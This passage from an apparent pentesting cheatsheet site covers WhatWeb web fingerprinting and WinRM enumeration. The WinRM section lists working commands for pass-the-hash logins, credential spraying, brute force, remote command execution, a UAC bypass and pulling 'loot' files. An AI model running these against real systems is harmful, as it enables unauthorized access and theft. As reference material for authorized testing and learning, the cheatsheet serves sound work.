\u003cstrong\u003eCMS\u003c/strong\u003e, \u003cstrong\u003eWeb frameworks\u003c/strong\u003e, \u003cstrong\u003eJS libs\u003c/strong\u003e, \u003cstrong\u003eAnalytics\u003c/strong\u003e, \u003cstrong\u003eWeb servers\u003c/strong\u003e, \u003cstrong\u003eTag managers\u003c/strong\u003e, \u003cstrong\u003eCDN\u003c/strong\u003e, \u003cstrong\u003eEcommerce\u003c/strong\u003e, \u003cstrong\u003ePayment processors\u003c/strong\u003e, \u003cstrong\u003eFont scripts\u003c/strong\u003e, \u003cstrong\u003eIssue trackers\u003c/strong\u003e, etc.\u003c/li\u003e\n\u003cli\u003eClick a detected tech for vendor links and version info (when available).\u003c/li\u003e\n\u003c/ol\u003e\n\u003cp\u003e\u003cstrong\u003eStealth value:\u003c/strong\u003e all detection runs in your browser against an already-loaded page → no extra requests to the target.\u003c/p\u003e","title":"wappalyzer"},{"content":"WhatWeb Cheatsheet Purpose: Identify web technologies — CMS, frameworks, web servers, JS libraries, analytics, version numbers — via signature plugins.\nBasic Usage whatweb \u0026lt;target\u0026gt; # Default scan whatweb https://target.tld whatweb -v https://target.tld # Verbose (full plugin output) whatweb -a 3 https://target.tld # Aggression level 3 whatweb target.tld --colour=never # No ANSI in output Common Flags Flag Description -v Verbose — full plugin details, not just summary -a \u0026lt;0-4\u0026gt; Aggression level (see below) -i \u0026lt;file\u0026gt; Read targets from file --input-file \u0026lt;file\u0026gt; Same as -i -U \u0026lt;ua\u0026gt; Custom User-Agent --header \u0026quot;K: V\u0026quot; Add custom header (repeatable) -c \u0026quot;\u0026lt;cookie\u0026gt;\u0026quot; Set Cookie header --user \u0026quot;\u0026lt;u:p\u0026gt;\u0026quot; HTTP Basic auth --proxy \u0026lt;host:port\u0026gt; Use proxy --proxy-user \u0026lt;u:p\u0026gt; Proxy auth --follow-redirect \u0026lt;mode\u0026gt; never, http-only, meta-only, same-site, always -t \u0026lt;n\u0026gt; Threads 
(default 25) --open-timeout \u0026lt;s\u0026gt; Connect timeout --read-timeout \u0026lt;s\u0026gt; Read timeout --log-brief \u0026lt;file\u0026gt; One-line summary log --log-verbose \u0026lt;file\u0026gt; Verbose log --log-xml \u0026lt;file\u0026gt; XML output --log-json \u0026lt;file\u0026gt; JSON output --log-magictree \u0026lt;file\u0026gt; MagicTree XML --log-sql \u0026lt;file\u0026gt; SQL insert statements -l List plugins -I \u0026lt;plugin\u0026gt; Show plugin info --plugins \u0026lt;list\u0026gt; Only run listed plugins (comma-separated) --no-errors Suppress connection errors Aggression Levels (-a) Level Name Behavior 1 Stealthy One GET per target, never follows redirects beyond that 2 (unused) Reserved 3 Aggressive Triggers extra requests when plugins want them (e.g. /wp-login.php) 4 Heavy Many requests per plugin; noisy, may set off WAF/IDS whatweb -a 1 target.tld # Single request, low noise whatweb -a 3 target.tld # Recommended for thorough enum whatweb -a 4 -v target.tld # Full noise, full detail Bulk / List Scanning whatweb -i targets.txt --log-brief whatweb.txt whatweb -i urls.txt -a 3 --log-json whatweb.json --no-errors cat ips.txt | whatweb --log-verbose verbose.log CIDR / range scan:\nwhatweb 192.168.1.0/24 --log-brief subnet.txt whatweb 192.168.1.1-50 -a 1 Routing Through Burp / ZAP whatweb --proxy 127.0.0.1:8080 https://target.tld whatweb --proxy 127.0.0.1:8080 --proxy-user user:pass target.tld Plugin Inspection whatweb -l # List all plugins whatweb -l | grep -i wordpress # Find a plugin whatweb -I WordPress # Show what a plugin checks for whatweb --plugins WordPress,Apache https://target.tld whatweb --plugins +/path/to/custom.rb target.tld # Add custom plugin Output Formats # Brief one-liners (good for diffing scans) whatweb -i list.txt --log-brief brief.txt # Verbose, human-readable whatweb -a 3 -v target.tld --log-verbose detailed.log # Machine-readable whatweb -i list.txt --log-json result.json whatweb -i list.txt --log-xml result.xml 
Practical Recipes # Stack fingerprint of a single target whatweb -a 3 -v https://target.tld # Survey an internal subnet, no errors clutter whatweb 10.67.10.0/24 -a 1 --no-errors --log-brief lab-stack.txt # Quiet recon through Burp for later replay whatweb --proxy 127.0.0.1:8080 -a 1 target.tld # Pair with wafw00f for stack + WAF in one pass wafw00f https://target.tld \u0026amp;\u0026amp; whatweb -a 3 -v https://target.tld Tips Default aggression is 1 — bump to 3 for real enumeration. WhatWeb reports plugin matches with confidence; treat low-confidence hits as leads, not facts. Combine with curl -sIL to confirm headers WhatWeb reported. For CMS-specific deep dives, switch to dedicated tools after WhatWeb (wpscan, droopescan, joomscan). Output to JSON if you need to diff stacks across hosts or over time. ","permalink":"https://d3vilsec.com/cheatsheets/pentesting/information-gathering-web-edition/fingerprinting/whatweb/","summary":"\u003ch1 id=\"whatweb-cheatsheet\"\u003eWhatWeb Cheatsheet\u003c/h1\u003e\n\u003cp\u003e\u003cstrong\u003ePurpose:\u003c/strong\u003e Identify web technologies — CMS, frameworks, web servers, JS libraries, analytics, version numbers — via signature plugins.\u003c/p\u003e\n\u003chr\u003e\n\u003ch2 id=\"basic-usage\"\u003eBasic Usage\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ewhatweb \u0026lt;target\u0026gt;                            \u003cspan style=\"color:#75715e\"\u003e# Default scan\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ewhatweb https://target.tld\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ewhatweb -v https://target.tld               \u003cspan 
style=\"color:#75715e\"\u003e# Verbose (full plugin output)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ewhatweb -a \u003cspan style=\"color:#ae81ff\"\u003e3\u003c/span\u003e https://target.tld             \u003cspan style=\"color:#75715e\"\u003e# Aggression level 3\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ewhatweb target.tld --colour\u003cspan style=\"color:#f92672\"\u003e=\u003c/span\u003enever           \u003cspan style=\"color:#75715e\"\u003e# No ANSI in output\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"common-flags\"\u003eCommon Flags\u003c/h2\u003e\n\u003ctable\u003e\n\t\u003cthead\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003cth\u003eFlag\u003c/th\u003e\n\t\t\t\t\t\u003cth\u003eDescription\u003c/th\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/thead\u003e\n\t\u003ctbody\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-v\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eVerbose — full plugin details, not just summary\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-a \u0026lt;0-4\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eAggression level (see below)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-i \u0026lt;file\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eRead targets from file\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--input-file \u0026lt;file\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eSame as \u003ccode\u003e-i\u003c/code\u003e\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-U 
\u0026lt;ua\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eCustom User-Agent\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--header \u0026quot;K: V\u0026quot;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eAdd custom header (repeatable)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-c \u0026quot;\u0026lt;cookie\u0026gt;\u0026quot;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eSet Cookie header\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--user \u0026quot;\u0026lt;u:p\u0026gt;\u0026quot;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eHTTP Basic auth\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--proxy \u0026lt;host:port\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eUse proxy\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--proxy-user \u0026lt;u:p\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eProxy auth\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--follow-redirect \u0026lt;mode\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003enever\u003c/code\u003e, \u003ccode\u003ehttp-only\u003c/code\u003e, \u003ccode\u003emeta-only\u003c/code\u003e, \u003ccode\u003esame-site\u003c/code\u003e, \u003ccode\u003ealways\u003c/code\u003e\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-t \u0026lt;n\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eThreads (default 25)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--open-timeout \u0026lt;s\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eConnect 
timeout\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--read-timeout \u0026lt;s\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eRead timeout\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--log-brief \u0026lt;file\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eOne-line summary log\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--log-verbose \u0026lt;file\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eVerbose log\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--log-xml \u0026lt;file\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eXML output\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--log-json \u0026lt;file\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eJSON output\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--log-magictree \u0026lt;file\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eMagicTree XML\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--log-sql \u0026lt;file\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eSQL insert statements\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-l\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eList plugins\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-I \u0026lt;plugin\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eShow plugin info\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--plugins 
\u0026lt;list\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eOnly run listed plugins (comma-separated)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--no-errors\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eSuppress connection errors\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/tbody\u003e\n\u003c/table\u003e\n\u003chr\u003e\n\u003ch2 id=\"aggression-levels--a\"\u003eAggression Levels (\u003ccode\u003e-a\u003c/code\u003e)\u003c/h2\u003e\n\u003ctable\u003e\n\t\u003cthead\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003cth\u003eLevel\u003c/th\u003e\n\t\t\t\t\t\u003cth\u003eName\u003c/th\u003e\n\t\t\t\t\t\u003cth\u003eBehavior\u003c/th\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/thead\u003e\n\t\u003ctbody\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e1\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eStealthy\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eOne GET per target, never follows redirects beyond that\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e2\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003e(unused)\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eReserved\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e3\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eAggressive\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eTriggers extra requests when plugins want them (e.g. 
\u003ccode\u003e/wp-login.php\u003c/code\u003e)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e4\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eHeavy\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eMany requests per plugin; noisy, may set off WAF/IDS\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/tbody\u003e\n\u003c/table\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ewhatweb -a \u003cspan style=\"color:#ae81ff\"\u003e1\u003c/span\u003e target.tld                  \u003cspan style=\"color:#75715e\"\u003e# Single request, low noise\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ewhatweb -a \u003cspan style=\"color:#ae81ff\"\u003e3\u003c/span\u003e target.tld                  \u003cspan style=\"color:#75715e\"\u003e# Recommended for thorough enum\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ewhatweb -a \u003cspan style=\"color:#ae81ff\"\u003e4\u003c/span\u003e -v target.tld               \u003cspan style=\"color:#75715e\"\u003e# Full noise, full detail\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"bulk--list-scanning\"\u003eBulk / List Scanning\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ewhatweb -i targets.txt --log-brief whatweb.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan 
style=\"display:flex;\"\u003e\u003cspan\u003ewhatweb -i urls.txt -a \u003cspan style=\"color:#ae81ff\"\u003e3\u003c/span\u003e --log-json whatweb.json --no-errors\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecat ips.txt | whatweb --log-verbose verbose.log\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003eCIDR / range scan:\u003c/p\u003e","title":"whatweb"},{"content":"WinRM Enumeration Cheatsheet Default Ports: 5985 (HTTP / WS-Management), 5986 (HTTPS)\nWhat is WinRM? Windows Remote Management — Microsoft\u0026rsquo;s implementation of WS-Management. Used for remote PowerShell, remote command execution, and administration.\nDetection nmap -p 5985,5986 \u0026lt;ip\u0026gt; nmap -p 5985,5986 -sV \u0026lt;ip\u0026gt; curl -s http://\u0026lt;ip\u0026gt;:5985/wsman curl -sk https://\u0026lt;ip\u0026gt;:5986/wsman Evil-WinRM # Password auth (HTTP) evil-winrm -i \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt; # SSL (HTTPS, port 5986) evil-winrm -i \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt; -S # Pass-the-Hash (NTLM) evil-winrm -i \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -H \u0026lt;nthash\u0026gt; # With scripts and executables directory evil-winrm -i \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt; \\ -s /path/to/ps1_scripts/ \\ -e /path/to/executables/ # Within evil-winrm shell menu # Show built-in commands upload /local/file.exe # Upload file download C:\\file.txt # Download file Invoke-Binary /local/exe # Run local exe in memory bypass_uac # UAC bypass CrackMapExec # Test credentials crackmapexec winrm \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt; crackmapexec winrm 192.168.1.0/24 -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt; # Credential spray crackmapexec winrm \u0026lt;ip\u0026gt; -u users.txt -p \u0026lt;pass\u0026gt; crackmapexec winrm \u0026lt;ip\u0026gt; 
-u \u0026lt;user\u0026gt; -p wordlist.txt # Pass-the-Hash crackmapexec winrm \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -H \u0026lt;nthash\u0026gt; # Execute commands crackmapexec winrm \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt; -x \u0026#39;whoami\u0026#39; # CMD crackmapexec winrm \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt; -X \u0026#39;whoami\u0026#39; # PowerShell crackmapexec winrm \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt; -X \u0026#39;Get-Process\u0026#39; PowerShell / Windows Native # Test WinRM connectivity Test-WSMan -ComputerName \u0026lt;ip\u0026gt; Test-WSMan -ComputerName \u0026lt;ip\u0026gt; -UseSSL # Interactive remote session Enter-PSSession -ComputerName \u0026lt;ip\u0026gt; -Credential \u0026lt;user\u0026gt; Enter-PSSession -ComputerName \u0026lt;ip\u0026gt; -UseSSL -Credential \u0026lt;user\u0026gt; # Non-interactive / scripted $cred = Get-Credential $sess = New-PSSession -ComputerName \u0026lt;ip\u0026gt; -Credential $cred Invoke-Command -Session $sess -ScriptBlock { whoami; hostname } Invoke-Command -ComputerName \u0026lt;ip\u0026gt; -Credential $cred -ScriptBlock { ipconfig } # Copy files over WinRM Copy-Item -Path C:\\local\\file.exe -Destination C:\\remote\\ -ToSession $sess Copy-Item -Path C:\\remote\\loot.txt -Destination C:\\local\\ -FromSession $sess impacket # winrm_exec (alternative) python3 winrm_exec.py \u0026lt;domain\u0026gt;/\u0026lt;user\u0026gt;:\u0026lt;pass\u0026gt;@\u0026lt;ip\u0026gt; Brute Force crackmapexec winrm \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -p wordlist.txt hydra -l \u0026lt;user\u0026gt; -P wordlist.txt \u0026lt;ip\u0026gt; -s 5985 http-post-form \\ \u0026#34;/wsman:Username=^USER^\u0026amp;Password=^PASS^:401\u0026#34; Common Scenarios Pwned user is in group: \u0026#34;Remote Management Users\u0026#34; → Can use WinRM \u0026#34;Administrators\u0026#34; → Full access via WinRM Check group membership: net localgroup 
\u0026#34;Remote Management Users\u0026#34; Key Facts Requires user to be in Remote Management Users or Administrators group Can be enabled with: Enable-PSRemoting -Force Firewall rule: WinRM-HTTP-In-TCP (port 5985) Often enabled on Domain Controllers and management servers ","permalink":"https://d3vilsec.com/cheatsheets/pentesting/footprinting/winrm/","summary":"\u003ch1 id=\"winrm-enumeration-cheatsheet\"\u003eWinRM Enumeration Cheatsheet\u003c/h1\u003e\n\u003cp\u003e\u003cstrong\u003eDefault Ports:\u003c/strong\u003e 5985 (HTTP / WS-Management), 5986 (HTTPS)\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eWhat is WinRM?\u003c/strong\u003e Windows Remote Management — Microsoft\u0026rsquo;s implementation of WS-Management. Used for remote PowerShell, remote command execution, and administration.\u003c/p\u003e\n\u003chr\u003e\n\u003ch2 id=\"detection\"\u003eDetection\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p 5985,5986 \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p 5985,5986 -sV \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecurl -s http://\u0026lt;ip\u0026gt;:5985/wsman\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecurl -sk https://\u0026lt;ip\u0026gt;:5986/wsman\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"evil-winrm\"\u003eEvil-WinRM\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" 
style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Password auth (HTTP)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eevil-winrm -i \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# SSL (HTTPS, port 5986)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eevil-winrm -i \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt; -S\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Pass-the-Hash (NTLM)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eevil-winrm -i \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -H \u0026lt;nthash\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# With scripts and executables directory\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eevil-winrm -i \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt; \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  
-s /path/to/ps1_scripts/ \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  -e /path/to/executables/\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Within evil-winrm shell\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003emenu                          \u003cspan style=\"color:#75715e\"\u003e# Show built-in commands\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eupload /local/file.exe        \u003cspan style=\"color:#75715e\"\u003e# Upload file\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003edownload C:\\file.txt          \u003cspan style=\"color:#75715e\"\u003e# Download file\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eInvoke-Binary /local/exe      \u003cspan style=\"color:#75715e\"\u003e# Run local exe in memory\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ebypass_uac                    \u003cspan style=\"color:#75715e\"\u003e# UAC bypass\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"crackmapexec\"\u003eCrackMapExec\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Test 
